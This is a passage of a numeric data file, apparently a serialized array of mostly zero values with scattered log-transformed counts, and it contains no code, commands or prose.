0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 5.952096120109145, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, \n 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 1.9459101490553132, 0, 4.406719247264253, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 3.2188758248682006, \n 1.6094379124341003, 0.0, 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 5.46286043483228, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, \n 2.772588722239781, 0.0, 0, 0.0, 0.0, 0, 1.6094379124341003, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.6931471805599453, 0.0, \n 1.3862943611198906, 5.101797476893978, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 3.58351893845611, 0.0, 0.0, 1.791759469228055, 0.0,\n 0.0, 2.1972245773362196, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 4.912654885736052, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0,\n 3.6888794541139363, 0, 4.160336650881089, 3.044522437723423, 0.0, 0, \n 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 3.0841946160253877, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 4.718498871295094, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 4.1588830833596715, \n 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0, 0.0, 0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0,\n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0,\n 2.1972245773362196, 0.0, 0, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991, 4.969813299576001, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 6.9558749307258045, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 1.3862943611198906, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.302585092994046, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.93848385770662, 2.1972245773362196, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0, 0,\n 0.0, 0.0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 5.1298987149230735, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0,\n 2.550898738446989, 0, 0, 3.0841946160253877, 0.0, 0.0, \n 3.295836866004329, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, \n 2.70805020110221, 0.0, 2.5649493574615367, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 2.550898738446989, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.367295829986474, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 4.160336650881089, 0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.178053830347946, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, \n 0.0, 0.0, 5.780743515792329, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, \n 6.907755278982138, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, \n 4.2626798770413155, 0, 0, 0, 0, 0, 5.723585101952381, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 1.6094379124341003, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 2.4849066497880004, 0.0, 0.0,\n 0.0, 1.7412592803704001, 4.969640753475787, 0.0, 3.0841946160253872, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.143134726391533, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 3.6375861597263857, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 2.772588722239781, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 5.567740402508132, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.9444389791664403, 0.0,\n 0.0, 0.0, 0.0, 1.3862943611198906, 0, 4.160336650881089, 0.0, 0.0, 0, \n 1.7412592803704001, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 8.995948045406804, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.3322045101752034, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 2.6390573296152584, 0.0, 0.0,\n 3.7369991058576035, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.970291913552122, 0, 3.7369991058576035,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.7535901911063645, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 6.423390507494619, 0.0, 0, 0, 0.0, 0, 4.160336650881089, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0, 3.6375861597263857, 0.0, 0.0, \n 0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 2.1972245773362196, \n 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0, 0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0, 3.044522437723423, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, \n 2.772588722239781, 0.0, 3.713572066704308, 0.0, 0, 0, 5.03709614637473,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, \n 3.7612001156935624, 0.0, 0.0, 2.772588722239781, 0, 3.2188758248682006,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.030104765080701, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, \n 